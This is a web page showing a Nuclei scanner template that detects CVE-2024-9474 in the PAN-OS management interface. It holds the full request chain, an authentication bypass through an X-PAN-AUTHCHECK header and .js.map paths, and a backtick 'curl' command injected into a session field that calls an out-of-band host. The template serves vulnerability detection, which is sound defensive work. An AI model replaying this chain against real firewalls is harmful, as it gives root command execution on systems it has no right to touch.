Skip to content

PAN-OS Management Web Interface - Command Injection

ID: CVE-2024-9474

Severity: high

Author: watchTowr,iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,panos,rce,kev

A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.Cloud NGFW and Prisma Access are not impacted by this vulnerability.

id: CVE-2024-9474
info:
name: PAN-OS Management Web Interface - Command Injection
author: watchTowr,iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
Cloud NGFW and Prisma Access are not impacted by this vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2024-9474
cwe-id: CWE-78
epss-score: 0.02252
epss-percentile: 0.89926
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: paloaltonetworks
product: pan-os
shodan-query:
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
- http.favicon.hash:"-631559155"
fofa-query: icon_hash="-631559155"
tags: cve,cve2024,panos,rce,kev
flow: http(1) && http(2) && http(3)
variables:
rand: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "0.0.0")'
- 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")'
condition: and
internal: true
- raw:
- |
POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1
matchers:
- type: word
part: body
words:
- "@start@PHPSESSID="
internal: true
extractors:
- type: regex
part: body
name: phpsessid
group: 1
regex:
- '@start@PHPSESSID=(.*?)@end@'
internal: true
- raw:
- |
GET /index.php/.js.map HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{phpsessid}}
X-PAN-AUTHCHECK: off
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "panos")'
condition: and
# digest: 4a0a004730450220420836f09725d549dd1af4f7dba8c3eb6a8dbb78495859d89bb9c58c1d5e9999022100fa34bea47d574d3e71373b81b4614dabcc3d869f47cb92ccc8c8006fae81db2b:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9474.yaml"

View on Github